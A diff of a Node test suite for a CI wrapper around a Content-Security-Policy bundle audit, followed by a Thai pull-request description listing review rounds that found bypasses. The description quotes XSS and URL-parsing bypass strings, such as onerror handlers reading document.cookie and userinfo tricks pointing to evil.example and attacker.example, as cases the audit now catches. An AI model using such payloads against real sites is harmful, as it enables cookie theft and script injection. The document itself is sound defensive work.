+    // เพราะ MSYS ถือว่าไฟล์ที่ขึ้นต้นด้วย `#!` เป็น executable อยู่แล้ว ซึ่งคือเหตุที่มันเขียว
+    // บนเครื่อง dev แต่จะแดงบน CI — คลาสเดียวกับที่ทั้ง PR นี้มีไว้กัน
+    chmodSync(shim, 0o755);
+    writeFileSync(join(dir, 'bin', `${name}.cmd`), CLI_SHIM_CMD);
+  }
+  writeFileSync(join(dir, 'frontend', 'package.json'), '{"name":"fixture","private":true}\n');
+  if (dist) {
+    mkdirSync(join(dir, 'frontend', 'dist'), { recursive: true });
+    writeFileSync(join(dir, 'frontend', 'dist', 'index.html'), '<!doctype html><html></html>\n');
+  }
+  return { dir, cleanup: () => rmSync(dir, { recursive: true, force: true }) };
+}
+
+/**
+ * จำนวนครั้งที่ wrapper สั่งรัน audit จริง — นับจาก **คำสั่งที่ถูกเรียก** ไม่ใช่ข้อความที่พิมพ์
+ * ออกมา เพราะข้อความจะโกหกได้ (นั่นคือบั๊กที่เทสชุดนี้มีไว้จับ) แต่ call log โกหกไม่ได้
+ */
+function auditRunCount(dir) {
+  const log = join(dir, 'cli-calls.log');
+  if (!existsSync(log)) return 0;
+  return readFileSync(log, 'utf8')
+    .split('\n')
+    .filter((line) => /^node\b.*audit-bundle-csp\.mjs/.test(line.trim())).length;
+}
+
+/**
+ * รัน wrapper ตัวใดตัวหนึ่ง — คืน stdout+stderr รวมกันและ exit code
+ *
+ * เป็น async (ไม่ใช่ `spawnSync`) เพราะเคสทั้งหมดเป็นการ **รอ process** ไม่ใช่งาน CPU
+ * — รันขนานกันได้ และ `spawnSync` จะบล็อก event loop จนความขนานที่ตั้งไว้ไม่เกิดขึ้นจริง
+ */
+function runWrapper(shell, dir, { skipFrontend = false, buildFails = false, testsFail = false } = {}) {
+  const binDir = join(dir, 'bin');
+  const env = {
+    ...process.env,
+    PATH: binDir + delimiter + (process.env.PATH ?? ''),
+    Path: binDir + delimiter + (process.env.Path ?? process.env.PATH ?? ''),
+    FIXTURE_BUILD_FAILS: buildFails ? '1' : '0',
+    FIXTURE_TEST_FAILS: testsFail ? '1' : '0',
+  };
+  // timeout กว้างโดยตั้งใจ: วัดจริงบนเครื่อง dev แล้วเคสหนึ่งใช้ถึง 74s ตอนสี่เคสแย่ง I/O กัน
+  // (และตัวเลขรวมแกว่ง 2m0s–2m39s ระหว่างรอบตามภาระเครื่อง) · 180s เดิมเหลือ headroom แค่เท่าตัว
+  // ซึ่งไม่พอ — เทสที่แดงแบบสุ่มใน pre-push จะสอนให้คนใช้ `--no-verify` เป็นนิสัย แล้ว gate ก็ตาย
+  // แบบเดียวกับที่ทั้ง PR นี้มีไว้กัน · ยังจับ hang ได้อยู่ เพราะเคสปกติไม่เคยแตะครึ่งของ 300s
+  const options = { cwd: dir, env, encoding: 'utf8', timeout: 300_000, maxBuffer: 8 * 1024 * 1024 };
+
+  const { command, args } = WRAPPERS[shell];
+
+  return new Promise((resolvePromise, rejectPromise) => {
+    execFile(command, args(skipFrontend), options, (error, stdout, stderr) => {
+      // exit code ที่ไม่ใช่ 0 มาถึงทาง `error` — เป็นผลลัพธ์ที่เทสหลายเคสรอดูอยู่ ไม่ใช่ความผิดพลาด
+      // ส่วนที่ spawn ไม่ติด (ENOENT) หรือ timeout ต้องดังออกมา ไม่ใช่ถูกอ่านว่า "exit 1"
+      if (error && typeof error.code !== 'number') {
+        rejectPromise(new Error(`รัน ${shell} ไม่สำเร็จ: ${error.message}`));
+        return;
+      }
+      resolvePromise({ out: `${stdout ?? ''}${stderr ?? ''}`, status: error ? error.code : 0 });
+    });
+  });
+}
+
+/**
+ * เคสเดียวกันต้องให้ผลเหมือนกันทั้งสอง wrapper — คนละคนใช้คนละตัว ความต่างจึงกลายเป็น
+ * "เครื่องฉันเขียว" ได้เงียบ ๆ · marker ที่ตรวจเป็น ASCII ล้วนเพื่อไม่ให้ code page ของ
+ * Windows console ทำให้เทสแกว่งไปตามภาษาในข้อความ
+ */
+
+// รันขนานกัน: ทุกเคสสร้าง workspace ของตัวเองและไม่แชร์ state — แบบ sequential ใช้เวลา
+// ~2m40s ซึ่งแพงเกินไปสำหรับ gate ที่ pre-push บังคับรันทุกครั้ง
+describe('ci-local — บล็อก CSP bundle audit', { concurrency: 4 }, () => {
+  for (const [shell, wrapper] of Object.entries(WRAPPERS)) {
+    const skipReason = wrapper.unavailable;
+
+    test(`[${shell}] build ล้ม + dist เก่ายังอยู่ → ต้องไม่รัน audit และต้อง FAIL`, { skip: skipReason }, async () => {
+      const { dir, cleanup } = makeWorkspace({ dist: true });
+      try {
+        const { out, status } = await runWrapper(shell, dir, { buildFails: true });
+        assert.doesNotMatch(out, /OK\s+csp bundle audit/, 'build ล้มแล้วห้ามรายงานว่า audit ผ่าน');
+        assert.match(out, /FAIL\s+csp bundle audit/, 'ต้องบอกตรง ๆ ว่า gate นี้ตรวจไม่ได้');
+        assert.equal(auditRunCount(dir), 0, 'ห้ามเอา dist ของ build เก่ามาตรวจแทน');
+        assert.notEqual(status, 0, 'สรุปรวมต้องแดง');
+      } finally {
+        cleanup();
+      }
+    });
+
+    test(`[${shell}] vitest ตกแต่ build ผ่าน → ต้องไม่รายงานว่า audit ผ่าน`, { skip: skipReason }, async () => {
+      // ช่องที่เทสชุดแรกมองไม่เห็น: stub ล้มเฉพาะ `npm … build` จึงไม่มีเคสไหนเดินผ่านเส้นทาง
+      // "คำสั่งกลาง ๆ ล้มแต่คำสั่งสุดท้ายผ่าน" ซึ่งเป็นเส้นทางที่ `set -e` ใน subshell ของ `if`
+      // ไม่ทำงาน — ci-local.sh เคยรายงาน `OK  frontend test + build` ทั้งที่ vitest ตก
+      // dist ที่ build จากโค้ดที่เทสไม่ผ่านก็เชื่อไม่ได้เท่ากับ dist ที่ build ไม่ออก
+      const { dir, cleanup } = makeWorkspace({ dist: true });
+      try {
+        const { out, status } = await runWrapper(shell, dir, { testsFail: true });
+        assert.doesNotMatch(out, /OK\s+csp bundle audit/, 'เทสตกแล้วห้ามรายงานว่า audit ผ่าน');
+        assert.doesNotMatch(out, /OK\s+frontend test \+ build/, 'vitest ตก จะบอกว่าขั้น frontend ผ่านไม่ได้');
+        assert.equal(auditRunCount(dir), 0, 'ห้ามตรวจ dist ที่มาจากโค้ดซึ่งเทสไม่ผ่าน');
+        assert.notEqual(status, 0, 'สรุปรวมต้องแดง');
+      } finally {
+        cleanup();
+      }
+    });
+
+    test(`[${shell}] build สำเร็จ + มี dist → audit ต้องรันและผ่าน`, { skip: skipReason }, async () => {
+      const { dir, cleanup } = makeWorkspace({ dist: true });
+      try {
+        const { out, status } = await runWrapper(shell, dir);
+        assert.match(out, /OK\s+csp bundle audit/);
+        assert.equal(auditRunCount(dir), 1, 'audit ต้องถูกเรียกครั้งเดียว');
+        assert.equal(status, 0, out);
+      } finally {
+        cleanup();
+      }
+    });
+
+    test(`[${shell}] สั่งข้าม build + มี dist → audit รันได้ แต่ต้องเตือนว่าเป็น build เก่า`, { skip: skipReason }, async () => {
+      const { dir, cleanup } = makeWorkspace({ dist: true });
+      try {
+        const { out, status } = await runWrapper(shell, dir, { skipFrontend: true });
+        assert.equal(auditRunCount(dir), 1, 'มี dist ให้ตรวจก็ควรตรวจ — "ไม่รู้" ไม่ควรกลายเป็น "สะอาด"');
+        assert.match(out, /WARN\s+csp bundle audit/, 'ต้องเตือนว่า dist อาจไม่ตรงกับโค้ดปัจจุบัน');
+        assert.equal(status, 0, out);
+      } finally {
+        cleanup();
+      }
+    });
+
+    test(`[${shell}] สั่งข้าม build + ไม่มี dist → ข้ามอย่างมีเสียง ไม่ใช่ FAIL`, { skip: skipReason }, async () => {
+      const { dir, cleanup } = makeWorkspace({ dist: false });
+      try {
+        const { out, status } = await runWrapper(shell, dir, { skipFrontend: true });
+        assert.equal(auditRunCount(dir), 0);
+        assert.match(out, /SKIP\s+csp bundle audit/, 'ต้องบอกทั้งสิ่งที่ขาดและวิธีแก้');
+        assert.doesNotMatch(out, /OK\s+csp bundle audit/, '"ไม่ได้ตรวจ" ห้ามพิมพ์ว่าผ่าน');
+        assert.equal(status, 0, out);
+      } finally {
+        cleanup();
+      }
+    });
+
+    test(`[${shell}] build สำเร็จแต่ไม่มี dist → ต้อง FAIL (build ไม่ออกไฟล์)`, { skip: skipReason }, async () => {
+      const { dir, cleanup } = makeWorkspace({ dist: false });
+      try {
+        const { out, status } = await runWrapper(shell, dir);
+        assert.match(out, /FAIL\s+csp bundle audit/);
+        assert.equal(auditRunCount(dir), 0);
+        assert.notEqual(status, 0);
+      } finally {
+        cleanup();
+      }
+    });
+  }
+});


### PR DESCRIPTION
## ทำไมต้องมี

เอกสาร `docs/frontend-security-headers.md` อ้างว่าตรวจ bundle แล้วว่าไม่มีอะไรจะชน CSP หลัง enforce — แต่การตรวจนั้นเป็น **ร้อยแก้วที่เขียนด้วยมือ และครอบแค่ 6 จาก 65 chunk** ที่ build ออกมาจริง ส่วนที่เหลือไม่มีใครดู

PR นี้เปลี่ยนคำกล่าวอ้างนั้นให้เป็นสิ่งที่เครื่องตรวจได้ทุกไฟล์ และตัดสินด้วย exit code (ข้อเสนอ R2 จาก code review ของ PR #142 · ต่อจาก R3 ที่ merge ไปแล้วใน #143 และ R1 ใน #144)

```bash
node scripts/audit-bundle-csp.mjs    # exit 0 = build ปัจจุบันไม่มีอะไรชน policy
```

## ที่เปลี่ยน (19 commits)

| ส่วน | ไฟล์ |
|---|---|
| สคริปต์ตรวจ | `scripts/audit-bundle-csp.mjs` (ใหม่) |
| เทส | `scripts/tests/audit-bundle-csp.test.mjs` (ใหม่ · 69 เทส) + `audit-bundle-csp.differential.test.mjs` (ใหม่ · 4 เทส differential) |
| เสียบเป็น gate | `.githooks/pre-push` (**ที่เดียวที่บังคับได้จริง** เพราะ Actions ปิด auto-trigger อยู่) · `scripts/ci-local.sh` · `scripts/ci-local.ps1` (หลังบล็อก frontend build เพราะต้องอ่าน `dist` · และลบบล็อกที่รันเทสชุดเดิมซ้ำสองรอบ) |
| line ending ของ hook | `.gitattributes` — `.githooks/*` ไม่มีนามสกุลจึงหลุดกฎ `*.sh` แล้วถูกแปลงเป็น CRLF ทั้งไฟล์ |
| กัน integration test เขียนลง production (M-2) | `backend/tests/bootstrap.php` · `backend/tests/Unit/TestDbHostGuardTest.php` (ใหม่ · 11 เทส) · `backend/tests/Integration/CspSummaryTest.php` |
| เอกสาร | `docs/frontend-security-headers.md` (หลักฐาน CSP รอบ 21 และ 22 ส.ค.) |
| runbook วันกดสวิตช์ | `docs/runbooks/csp-enforce-switch.md` (ใหม่) — ตารางเกณฑ์พร้อมสถานะ · diff ที่ต้องแก้ 2 ไฟล์ · **การยืนยันว่า header เปลี่ยนจริงบน live** · ขั้นตอนย้อนกลับ |
| แผน | `docs/superpowers/plans/2026-08-19-csp-bundle-audit.md` |

**ขอบเขตที่พ่วงมานอกแผน R2 — ประกาศไว้ตรง ๆ เพราะรีวิวทั้งสองแกนจับได้ตรงกัน:** แผนระบุ
Create 2 · Modify 4 แต่ PR นี้มี (ก) **M-2 guard** ที่กัน integration test เขียนลง production
ซึ่งไม่เกี่ยวกับ bundle/CSP เลย และ (ข) **หลักฐาน CSP รอบ 21–22 ส.ค.** ในเอกสาร ทั้งสอง
ถูกทำระหว่างทางเพราะเจอตอนกำลังทำ R2 · ทั้งคู่แยกเป็นคอมมิตของตัวเองแล้ว (`6fd2b58`,
`bb47d41`, `647d4b4`, `56a65a2`) แต่ไม่ได้แยกเป็น PR ต่างหาก — ถ้าต้องการรีวิวแยกจริง ๆ
บอกได้ ยังไม่ merge

## หลักการเดียวกับทั้ง issue นี้

> **"ไม่รู้" ต้องไม่กลายเป็น "สะอาด"**

| สถานการณ์ | ผล |
|---|---|
| ไม่มี `frontend/dist` | ✗ (ไม่ใช่ skip) |
| อ่าน policy จาก `render.yaml` ไม่ได้ | ✗ |
| เจอ origin ที่ policy ไม่ได้อนุญาต | ✗ |
| ไฟล์ที่อ่านไม่ได้ | รายงานออกมา ไม่กลืนเงียบ |

policy **อ่านจาก `render.yaml` เป็นแหล่งความจริงเดียว** ไม่ hardcode ซ้ำ — ใช้ `parseRenderHeaders()` ที่ `verify-live-headers.mjs` export ไว้แล้ว ข้อยกเว้นที่ hardcode ได้มีเฉพาะ URL ที่ **ไม่เคยถูก fetch** และมีคอมเมนต์อธิบายเหตุผลรายตัว (`www.w3.org` = XML namespace ไม่ใช่การโหลด · `vuejs.org` = ลิงก์ในข้อความ error · `tailwindcss.com` = อยู่ในคอมเมนต์ลิขสิทธิ์ของ CSS) และมีเทสบังคับว่าทุก entry ต้องมีเหตุผลเขียนกำกับ

## กฎที่ตรวจ

| กฎ | ผูกกับ directive |
|---|---|
| ไม่มี inline `<script>` ที่มีเนื้อหา | `script-src` ที่ไม่มี `'unsafe-inline'` |
| ไม่มี inline event handler (`on*=`) ในแท็ก | `script-src` ที่ไม่มี `'unsafe-inline'` |
| ไม่มี `eval(` / `Function(` | `script-src` ที่ไม่มี `'unsafe-eval'` |
| **URL ที่รู้ว่าถูกเรียกจริง** (argument ของ `fetch()` / `axios` / `XHR.open()`) | **`connect-src` เท่านั้น** |
| **คู่แท็ก+attribute ที่ spec บอก directive แน่นอน** (`<script src>` · `<img src|srcset>` · `<iframe src>` · `<audio\|video\|track src>` · `<object data>` / `<embed src>` · `<form action>` · `<link rel=stylesheet href>` · `<input type=image src>` …) | **directive นั้นโดยตรง** · fallback ไป `default-src` ตามที่ browser ทำ |
| attribute/property ที่เป็น URL แต่บริบทบอก directive ไม่ได้ (`el.src = "//host"` ในโค้ด JS · `<source src>` ที่เป็น `img-src` หรือ `media-src` แล้วแต่ parent) | allowlist รวม |
| absolute URL ที่บอกบริบทไม่ได้ | allowlist รวม · รายงาน directive ที่เทียบตาม policy จริง |
| `url()` ภายนอกใน stylesheet **ทุกไฟล์ ไม่ใช่แค่ `.css`** รวมรูป `url(//host/…)` | allowlist รวม |
| **แท็กที่ยาวเกินลิมิตจนอ่าน attribute ไม่ครบ** (`unparsable-tag`) | `script-src` — ฟ้องว่าตรวจไม่ได้ ไม่ใช่ข้ามเงียบ ๆ |
| ไม่มีไฟล์ font ใน `dist` | `font-src` ที่ไม่มี `'self'` |

**แถวที่ 4 และ 5 สำคัญที่สุด** — ถ้าเทียบ URL กับ allowlist รวมทุก directive origin ที่ policy อนุญาตไว้เพื่อ *โหลดฟอนต์* จะกลายเป็นใบผ่านให้ *ยิง API* (ความเสี่ยงข้อ 1 ในเอกสาร: `VITE_API_URL` แบบ absolute) หรือให้ *โหลดสคริปต์* — `<script src="//fonts.gstatic.com/x.js">` ที่ `script-src 'self'` บล็อกจริง เส้นทาง attribute นี้ค้างมาตั้งแต่รอบที่ 2 และเพิ่งปิดในรอบที่ 7

แถว `font-src` คือความเสี่ยงข้อ 2 ที่เอกสารเดิมเตือนไว้แต่ไม่มีอะไรจับ — วันไหนมีคนย้ายมา self-host font เว็บจะพังทันทีหลัง enforce ทั้งที่ดูเหมือนแค่เปลี่ยน asset

**host ถูกตัดสินด้วย URL parser ไม่ใช่ character class** — และ**ไม่มีอักขระตัวไหนถูกใช้เป็นตัวปิด URL อีกต่อไป** `absoluteUrlCandidates()` อ่านต่อไปให้ยาวที่สุดแล้วปล่อยให้ `new URL()` ตัดสิน authority เอง · `_` ในชื่อ host, userinfo ทุกรูป (`https://allowed.example@evil.example/` และรูปที่คั่นด้วย `, ; ( ) { }` ซึ่งเป็นอักขระที่อยู่ในส่วน userinfo ได้ตามมาตรฐาน) และ IPv6 literal จึงไม่ทำให้ origin ถูกอ่านผิดเป็นตัวที่ policy อนุญาต · regex ทำหน้าที่แค่คว้าก้อนที่น่าจะเป็น URL

**ชื่อ event handler เทียบกับชุดปิดของ event จริง** ไม่ใช่รูป `on` ตามด้วยอะไรก็ได้ — attribute ชื่อ `onfoo` ที่ไม่ใช่ event จริง browser ไม่ compile เป็นโค้ดตั้งแต่แรก จึงไม่มีอะไรให้ `script-src` บล็อก (**ข้อจำกัดที่รู้ตัว**: event ที่ browser เพิ่มในอนาคตจะหลุดจนกว่าจะมีคนเติม — แลกกับการไม่ฟ้อง ` once = true` ในโค้ด JS ปกติ ซึ่งเคยเกิดสามรอบ)

## สิ่งที่ code review จับได้ระหว่างทาง

เจ็ดรอบ ทุกรอบเจอรูปแบบเดียวกันคือ **false clean** — gate ตอบ PASS ให้ของที่ CSP จะบล็อกจริง

**รอบที่ 1**

1. **regex จับ event handler ให้ false positive กับไฟล์ JS ปกติ** (` once = true`, ` only = 1`) และผิดความหมายด้วย — CSP ไม่ได้บล็อก `el.onclick = fn` ที่เป็นการ assign property
2. **finding ซ้ำท่วมจอ** เมื่อ origin เดียวโผล่หลายที่ในไฟล์เดียว → ยุบเป็นรายการเดียวพร้อมจำนวน
3. **bundler แปลง `</script>` เป็น `<\/script>`** ทำให้ regex แบบจับคู่เปิด-ปิดมองไม่เห็น HTML ที่ฝังใน JS → เปลี่ยนไปจับที่แท็กเปิด

**รอบที่ 2** (`a134432`) — ทุกข้อพิสูจน์ด้วยการรัน ไม่ใช่การอ่านโค้ด

4. **gate ตอบ PASS บนเคสที่ตัวเองมีไว้จับ** — allowlist ยุบทุก directive เป็น Set เดียว `fetch("https://fonts.gstatic.com/…")` จึงรอดทั้งที่ `connect-src` เป็น `'self'`
5. guard `looksLikeHtml` ตัดสินระดับ**ไฟล์** พอ chunk เดียวมีทั้ง `<script` และโค้ดปกติ false positive ข้อ 1 ก็กลับมา → จำกัดการค้น handler ไว้ในช่วงแท็กเปิด เลิกเดาชนิดไฟล์
6. ข้อความ finding hardcode รายการ directive ที่ตกหล่น `style-src` → คำนวณจาก policy จริง

**รอบที่ 3** (`7ebf96c`) — จาก [รีวิวบน PR นี้](https://github.com/Arnutt-N/smart-port/pull/146#issuecomment-5357040475) ทั้งสามข้อเป็น false clean

7. **protocol-relative URL (`//host/…`) รอดทุกกฎ** เพราะโค้ดบังคับ `https?://` ทุกจุด `fetch("//attacker.example/…")` จึงได้ PASS → รวมเป็น `originOf()` จุดเดียวที่ทุกกฎเรียกใช้
8. **`url()` ถูกผูกกับนามสกุล `.css`** ทั้งที่ `<style>` ใน HTML และ CSS-in-JS ก็โหลดจริง — ขัดหลักการที่ข้อ 5 เพิ่งยึดเองว่าให้ผูกกับรูปทรงของ markup ไม่ใช่ชนิดไฟล์
9. **`data-src=` / `data-type=` ทำให้ inline `<script>` ถูกข้าม** เพราะ `\b` ถือว่า `-` เป็นขอบเขตของคำ → `parseAttributes()` เทียบชื่อ attribute เต็ม

**รอบที่ 4** (`c98b9aa` → `d8482cb`) — รอบนี้หนักที่สุด เพราะ guard ที่เพิ่งเพิ่มเข้าไปเพื่อปิดช่องหนึ่ง **กลับเปิดอีกช่องหนึ่ง**

10. **ปิดทีละเคสที่มีคนรายงาน แทนที่จะปิดทั้งคลาส** — `//host` ที่ขึ้นต้นด้วย `_` หรือเป็น IPv6 literal ยังรอด เพราะ guard บังคับ alnum ตัวแรก · `Function(` ที่ไม่มี `new` ก็ไม่ถูกจับ
11. **guard นับ quote ให้ครบคู่ทำให้แท็กถูกข้ามทั้งอัน** — `<img alt="a>b" src="//evil/x">` ถูกอ่านเป็น `<img alt="a>` แล้ว `src` อยู่นอกช่วงตรวจ → กฎ URL เลิกพึ่งขอบเขตของแท็ก แตกเป็นกฎที่จับ **คู่ชื่อ-ค่า** แทน (ครอบ `el.src = "//host"` ในโค้ด JS ไปด้วย)
12. `auditBundle()` ยาว 167 บรรทัด — ขนาดของมันคือเหตุผลที่ `continue` ผิดทิศหนึ่งตัวรอดสายตามาได้ → แตกกฎออกเป็นฟังก์ชันบริสุทธิ์ เหลือ 61 บรรทัด

**รอบที่ 5** (`63c4fa7`) — สองช่องที่เหลือของคลาสเดียวกัน: **กฎเดาโครงสร้างเอง แทนที่จะให้ตัว parse จริงตัดสิน**

13. **กฎ handler ยังพึ่งขอบเขตของแท็ก ทั้งที่กฎ URL เลิกพึ่งไปแล้วในข้อ 11** — `<img alt="a>b" onclick="alert(document.cookie)">` ผ่านฉลุย → `openTags()` แตกแท็กโดยเคารพ quote แบบเดียวกับ HTML tokenizer (`>` ในค่า attribute ไม่ปิดแท็ก ซึ่งตรงกับที่ browser อ่านจริง) เลิกใช้ guard นับ quote ที่เป็นการชดเชยผลของการแตกแท็กผิดตั้งแต่แรก
14. **กฎ origin รวมตัดสิน host เองด้วย `[a-zA-Z0-9.-]+`** ซึ่งผิดสามทางพร้อมกัน — `https://fonts.googleapis.com_evil.example/steal` ถูกตัดหัวเหลือ origin ที่ `style-src` อนุญาต = **PASS เงียบสนิท** (ยิ่ง policy อนุญาต origin ไว้มาก ช่องนี้ยิ่งกว้าง เพราะทุก origin ที่อนุญาตกลายเป็นคำนำหน้าที่ยืมได้) · `https://fonts.gstatic.com@evil.example/` host จริงคือ `evil.example` ตามมาตรฐาน URL · `http://[2001:db8::1]/` ไม่เข้าข่ายเลยสักตัวจึงไม่มีกฎไหนครอบ → ให้ `originOf()` (คือ `new URL()`) เป็นคนตัดสิน regex เหลือหน้าที่แค่คว้าก้อนที่น่าจะเป็น URL

**รอบที่ 6** (`f900816`) — **รอบแรกที่ผู้ตรวจไม่ใช่ผู้เขียน** ([รีวิวบน PR นี้](https://github.com/Arnutt-N/smart-port/pull/146#issuecomment-5377953306)) และเป็นรอบที่สองที่**การแก้ของรอบก่อนหน้าเป็นตัวเปิดช่องใหม่**

15. **ตัวคั่นที่รอบที่ 5 เพิ่มเข้ามาเปิดช่องเดิมกลับมาทันที** — `, ; ( ) { }` ถูกเติมเข้า character class เพื่อให้ `url(a),url(b)` แยกเป็นสอง origin แต่อักขระเหล่านี้ **อยู่ในส่วน userinfo ได้ตามมาตรฐาน URL** · `https://fonts.gstatic.com,x@evil.example/steal` จึงถูกอ่านเป็น origin ที่ `font-src` อนุญาต = PASS เงียบ ซึ่งเป็นคำอธิบายเดียวกับข้อ 14 คำต่อคำ ต่างแค่ตัวคั่น → regex ตัดเฉพาะ `)` แล้วลอกวรรคตอนท้ายก้อนทิ้งก่อนส่งให้ URL parser
16. **กฎ handler บังคับช่องว่างนำหน้า `on` ซึ่ง HTML ไม่ได้บังคับ** — `<img/onerror=…>` (สำนวน bypass ตัวกรอง XSS ที่ใช้กันมานาน), `<img src=x /onerror=…>` และ `<a href="x"onclick=…>` ผ่านทั้งสามรูป → ใช้ `parseAttributes()` ที่ไฟล์นี้มีอยู่แล้วแทน regex ดิบ
17. **เทส "กันแก้เกิน" ของรอบที่ 5 เขียวด้วยเหตุผลคนละอย่างกับที่มันอ้าง** — fixture ไม่มี `>` เลยสักตัว pseudo-tag จึง `terminated:false` แล้ว guard ก็ข้ามให้ · เติม `const f = x=>x;` เข้าไปตัวเดียวเทสแดงทันที → ชุดปิดของ event ปิด regression M-A ได้จริงเป็นครั้งแรกหลังยั้งไม่อยู่สามรอบ
18. **ลิมิตความยาวแท็กกลายเป็นใบผ่าน** — `<img src="data:…4200 ตัว" onerror=…>` เงียบสนิท ซึ่งเป็นรูปบริสุทธิ์ของ "ไม่รู้" ที่กลายเป็น "สะอาด" และเส้นแบ่งอยู่ใกล้ของจริง (`assetsInlineLimit` ของ Vite = 4096 ไบต์ ≈ 5,461 ตัวอักษรเมื่อ base64) → แยก `truncated` ออกจากการเจอ `<` ตัวถัดไป แล้วฟ้อง `unparsable-tag`
19. **เอกสารอ้างว่าตรวจ attribute `data` ทั้งที่กฎไม่เคยมี** — `<object data="//host">` ผ่าน ขณะที่ `<embed src="//host">` ในไฟล์เดียวกันถูกจับ

**รอบที่ 7** (`15dfe00`) — ผู้ตรวจเป็น **codex (OpenAI) คนละ provider family กับรอบที่ 6** ทั้งสองข้อยืนยันเองด้วย fixture ก่อนแก้ ไม่ได้เชื่อรายงานตรง ๆ

20. **`)` ก็อยู่ในส่วน userinfo ได้ เหมือนตัวคั่นทุกตัวก่อนหน้า** — รอบที่ 6 เอา `, ; ( { }` ออกแต่ **เก็บ `)` ไว้** ด้วยเหตุผลว่ามันปิด `url(…)` โดยไม่ตรวจว่ามันอยู่ใน userinfo ได้เหมือนกัน `https://fonts.gstatic.com)x@evil.example/steal` จึงยังผ่านฉลุย · เป็นครั้งที่สามติดที่การแก้ของรอบก่อนหน้าเป็นตัวเปิดช่องใหม่ และเป็นคำอธิบายเดียวกันคำต่อคำเป็นรอบที่สาม ต่างแค่ว่าอักขระตัวไหนถูกเลือกมาเป็นตัวคั่น → **เลิกใช้อักขระใดเป็นตัวปิด URL ทั้งหมด** `absoluteUrlCandidates()` เดินหาทุกตำแหน่งที่ขึ้นต้นด้วย `https?://` แล้วอ่านยาวที่สุด ปล่อยให้ `new URL()` ตัดสิน authority · เหตุผลเดิมที่ต้องมีตัวคั่นคือกัน `url(a),url(b)` กลายเป็นก้อนเดียว ซึ่งวิธีใหม่ได้ผลเดียวกันโดยไม่ต้องเดา เพราะ **b มีจุดเริ่มของตัวเอง** จึงถูก parse แยกอยู่แล้ว
21. **URL ใน attribute ที่บริบทบอก directive ได้ กลับถูกเทียบกับ allowlist รวม** — `<script src="//fonts.gstatic.com/x.js">` ผ่าน ทั้งที่ `script-src 'self'` บล็อกจริง (gstatic อยู่ใน `font-src` เท่านั้น) เช่นเดียวกับ `<img src>` และ `<object data>` · **นี่คือความผิดพลาดเดียวกับข้อ 4 ของรอบที่ 2** ซึ่งตอนนั้นแก้เฉพาะเส้นทาง `fetch()` — เส้นทาง attribute ค้างมาตั้งแต่รอบนั้นและรอด reviewer มาห้ารอบ → `TAG_ATTRIBUTE_DIRECTIVES` map คู่แท็ก+attribute ที่ CSP รู้ directive แน่นอน แล้วเทียบกับ directive นั้นโดยตรง พร้อม fallback ไป `default-src` ตามที่ browser ทำ · **mapping นี้เป็นข้อเท็จจริงจาก spec ไม่ใช่การเดาโครงสร้าง** (`<img src>` อยู่ใต้ `img-src` เสมอไม่ว่าไฟล์หน้าตาอย่างไร) จึงไม่ใช่คลาสบั๊กเดิมที่ไล่ปิดกันมาเจ็ดรอบ · ใส่เฉพาะคู่ที่ไม่กำกวม — `<source src>` เป็น `img-src` ใน `<picture>` แต่ `media-src` ใน `<video>` ซึ่ง static analysis แยกไม่ได้ จึงใช้ allowlist รวมตามเดิม · `<link href>` ทำเฉพาะ `rel="stylesheet"` · `<input src>` เฉพาะ `type="image"` · `<a href>` เป็นการ navigate ที่ fetch directive ไม่คุม จึงไม่ map

**รอบที่ 8** (`38b3922` · `647d4b4`) — รีวิว **สองแกนขนานกัน** (Standards = ตรงมาตรฐานที่ repo เขียนไว้ไหม · Spec = ตรงกับแผน R2 กับ issue #113 ไหม) ผู้ตรวจสองตัวไม่เห็น context ของกันและกัน

22. **`FETCH_DIRECTIVES` เป็น "รายการที่พิมพ์ค้างไว้" ที่คอมเมนต์ของตัวเองบอกว่าไม่ใช่** — คอมเมนต์เขียนว่า "คำนวณจาก policy ไม่ใช่รายการที่พิมพ์ค้างไว้ ซึ่งเคยตกหล่น `style-src`" แต่โค้ดคือ array 6 ตัวจริง ๆ และตกหล่นซ้ำรอบสอง: `frame-src` · `object-src` · `form-action` ที่ข้อ 21 เพิ่งเพิ่มเข้ามาแต่ไม่มีใครเติมในรายการ → แก้ที่รากด้วย `directivesWithOrigins(policy)` ที่อ่านจาก policy ตรง ๆ แทนการเติมสามตัวแล้วรอตกหล่นรอบสาม · เทสใหม่แดงบนโค้ดเก่าด้วยข้อความ `connect-src / script-src` ทั้งที่ทั้งคู่เป็น `'self'` ไม่มี origin เลย
23. **false positive ที่ซ่อนอยู่: `connect-src` ไม่ fallback ไป `default-src`** — `policy.get('connect-src')` ตรง ๆ ให้เซ็ตว่างเมื่อ policy ไม่ประกาศ connect-src แล้วฟ้อง fetch ทุกปลายทางทั้งที่ `default-src` อนุญาต · กฎ attribute ข้าง ๆ fallback ถูกอยู่แล้ว ความไม่สอดคล้องจึงซ่อนอยู่จนเอามาเทียบกัน
24. **gate ไม่เคยถูกบังคับให้รัน** (แกน Spec: "ตามตัวอักษรของแผนครบ แต่ไม่ได้ผลตามเจตนา") — เสียบไว้ใน ci-local เท่านั้นซึ่งไม่มีอะไรบังคับให้ใครรัน และ Actions ปิด auto-trigger อยู่ → เสียบเข้า `pre-push`
25. **wrapper ขัด fail-closed ที่ตัวสคริปต์ยึดไว้** — ci-local ผูกเงื่อนไขกับ flag `--skip-frontend` จึงข้าม audit ทุกครั้งที่สั่งข้าม build ทั้งที่ `dist` เดิมยังตรวจได้ → ผูกกับ **การมีอยู่ของ dist** แทน และถ้า build เพิ่งรันแต่ไม่มี dist ตอนนี้ fail ไม่ใช่เงียบ
26. **`.githooks/*` เป็น CRLF ทั้งไฟล์โดยไม่มีใครเห็น** — `.gitattributes` บังคับ LF เฉพาะ `*.sh` แต่ hook ไม่มีนามสกุล + `core.autocrlf=true` · bash ที่มากับ git ทนได้ แต่ bash ของ WSL ปฏิเสธด้วย `syntax error` ซึ่งเป็นสภาพแวดล้อมที่ `backend/tests/run.sh` ใช้จริง
27. **allowlist ของ DB host guard กว้างเกินจำเป็น** — `$localHosts` มี 8 ค่าแต่ docblock อธิบาย 3 · `mysql`/`mariadb`/`smartport-db` ไม่มี compose หรือ workflow ไหนใช้ (ยืนยันด้วยการค้นของจริง) → เหลือ 5 ค่าที่อธิบายได้ทุกตัว

## สิ่งที่เปลี่ยนกระบวนการ — differential test (`22c84b7`)

หกรอบที่ผ่านมาพิสูจน์ว่าการไล่ปิดทีละรูป**แพ้เสมอ** เพราะมันแข่งกับจินตนาการของผู้เขียน ไม่ใช่กับมาตรฐานจริง

